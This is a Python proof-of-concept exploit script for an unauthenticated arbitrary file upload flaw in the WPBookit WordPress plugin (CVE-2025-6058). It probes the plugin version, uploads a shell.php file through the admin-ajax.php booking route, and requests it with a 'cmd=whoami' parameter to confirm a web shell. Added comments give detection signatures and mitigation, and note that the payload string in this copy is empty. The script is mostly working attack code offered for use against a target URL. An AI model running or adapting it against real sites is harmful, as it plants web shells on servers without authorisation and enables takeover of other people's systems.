"""Proof-of-concept checker/exploit for the WPBookit arbitrary file upload (CVE-2025-6058, per the argparse description below).

Flow, as implemented in this file:
  1. ``get_version`` reads ``wp-content/plugins/wpbookit/README.txt`` and treats a
     ``Stable tag`` of 1.0.4 or lower as vulnerable.
  2. ``Nxploited`` sends a multipart POST to ``wp-admin/admin-ajax.php`` with
     ``action=wpb_ajax_post`` / ``route_name=add_booking_type`` and a file in the
     ``cover_image_img`` field, then GETs ``wp-content/uploads/<year>/<month>/shell.php``.

Defender notes (derived only from the requests this script sends):
  - Detection: an unauthenticated multipart POST to admin-ajax.php carrying
    ``action=wpb_ajax_post`` and ``route_name=add_booking_type`` with a file part named
    ``cover_image_img``, followed by a GET for a ``.php`` file under
    ``wp-content/uploads/<year>/<month>/`` with a ``cmd`` query parameter. The fixed
    User-Agent string set in ``main`` is a weak secondary indicator.
  - Mitigation: this script treats any Stable tag above 1.0.4 as not vulnerable, so keep
    the plugin above that version; denying PHP execution under the uploads directory is
    the usual defence in depth for this class of upload flaw.
"""
import argparse
import requests
import re
import os
import sys
import time
from datetime import datetime

# Silences urllib3 warnings; relevant because main() sets session.verify = False,
# which would otherwise emit an InsecureRequestWarning on every HTTPS request.
requests.packages.urllib3.disable_warnings()


def print_banner() -> None:
    """Print the tool's ASCII-art banner and author line."""
    # NOTE(review): the art's line breaks and spacing were lost in this copy of the file;
    # restore the original layout from upstream if the banner matters.
    banner = r""" ______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______ / \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \ /$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ | $$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ | $$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$< $$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ | $$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ | $$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/ $$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ """
    print(banner)
    print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited\n")


def format_url(url: str) -> str:
    """Normalise the target URL: prepend ``http://`` when no scheme is given and drop one trailing slash."""
    if not url.startswith("http://") and not url.startswith("https://"):
        url = "http://" + url
    if url.endswith('/'):
        url = url[:-1]
    return url


def version_to_tuple(version: str) -> tuple[int, ...]:
    """Turn a dotted version string such as ``"1.0.4"`` into ``(1, 0, 4)`` for tuple comparison.

    Raises ValueError on a non-numeric or empty component; is_vulnerable_version
    catches that and reports "not vulnerable".
    """
    return tuple(int(part) for part in version.split('.'))


def is_vulnerable_version(found_version: str, max_vulnerable: str = "1.0.4") -> bool:
    """Return True when ``found_version`` compares <= ``max_vulnerable`` as integer tuples.

    Any parse failure (non-numeric component, empty string) is treated as not vulnerable
    rather than aborting the run.
    """
    try:
        return version_to_tuple(found_version) <= version_to_tuple(max_vulnerable)
    except Exception:
        # Deliberate best-effort: an unparseable version never counts as vulnerable.
        return False


def get_version(url: str, session: requests.Session, headers: dict[str, str]):
    """Fetch the plugin's README.txt and return its Stable tag when it is <= 1.0.4.

    Returns None when the README is not served with HTTP 200, contains no
    ``Stable tag:`` line, or the tag is above 1.0.4.
    """
    print("[*] Checking plugin version ...")
    # Fixed pause before the first request to the target; the duration is arbitrary.
    time.sleep(3)
    readme_url = f"{url}/wp-content/plugins/wpbookit/README.txt"
    resp = session.get(readme_url, headers=headers, timeout=10)
    if resp.status_code != 200:
        return None
    # Only digits and dots are captured, so a tag like "1.0.4-beta" yields "1.0.4".
    match = re.search(r"Stable tag:\s*([0-9.]+)", resp.text)
    if not match:
        return None
    version = match.group(1).strip()
    if is_vulnerable_version(version, "1.0.4"):
        return version
    else:
        return None


def make_shell() -> str:
    """Write the payload file ``shell.php`` in the current working directory and return its name.

    NOTE(review): ``shell`` is empty in this copy, so the file written is zero bytes and the
    confirmation check in Nxploited (which requires a non-empty response body) cannot succeed.
    """
    shell = ''
    shell_name = "shell.php"
    with open(shell_name, "w") as f:
        f.write(shell)
    return shell_name


def Nxploited(url: str, session: requests.Session, headers: dict[str, str]):
    """Upload shell.php through the ``wpb_ajax_post`` / ``add_booking_type`` AJAX route and try to confirm it.

    Returns the relative path (including ``?cmd=whoami``) when the follow-up GET answers
    200 with a non-empty body that does not contain the literal "whoami"; otherwise None.
    The upload response (``resp``) is assigned but never inspected, so the outcome is
    inferred solely from the follow-up GET.
    """
    print("[*] Exploiting file upload ...")
    time.sleep(2)
    ajax_url = f"{url}/wp-admin/admin-ajax.php"
    shell_file = make_shell()
    with open(shell_file, 'rb') as f:
        # These form values and the multipart field name are the request signature a WAF or
        # access-log rule can key on: no authentication cookie or nonce is sent with them.
        files = { 'cover_image_img': (shell_file, f, 'application/octet-stream') }
        data = { 'action': 'wpb_ajax_post', 'route_name': 'add_booking_type', 'title': 'Test', 'booking_type': 'Nxploited' }
        resp = session.post(ajax_url, headers=headers, files=files, data=data, timeout=15)
    # The expected upload location is derived from the LOCAL clock; it assumes the target files
    # uploads under wp-content/uploads/<YYYY>/<MM>/ for the same month — TODO confirm against the server.
    now = datetime.now()
    shell_path = f"wp-content/uploads/{now.year}/{now.strftime('%m')}/shell.php?cmd=whoami"
    check_url = f"{url}/{shell_path}"
    check = session.get(check_url, headers=headers, timeout=10)
    # Local cleanup only happens on this path; an exception in either request leaves shell.php behind.
    os.remove(shell_file)
    if check.status_code == 200 and check.text.strip() and "whoami" not in check.text:
        return shell_path
    else:
        return None


def main() -> None:
    """CLI entry point: parse ``-u/--url``, probe the plugin version, then attempt the upload and report."""
    print_banner()
    parser = argparse.ArgumentParser(description="CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)")
    parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com")
    args = parser.parse_args()
    session = requests.Session()
    # TLS certificate verification is disabled for every request (see disable_warnings() at import time).
    session.verify = False
    headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" }
    url = format_url(args.url)
    version = get_version(url, session, headers)
    if not version:
        print("[-] Target is not vulnerable or version could not be detected.")
        sys.exit(1)
    shell_path = Nxploited(url, session, headers)
    if shell_path:
        print(f"[+] Exploitation successful!")
        print(f"[+] Shell path: {shell_path}")
        print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited")
    else:
        print("[-] Exploitation failed or shell could not be confirmed.")


if __name__ == "__main__":
    main()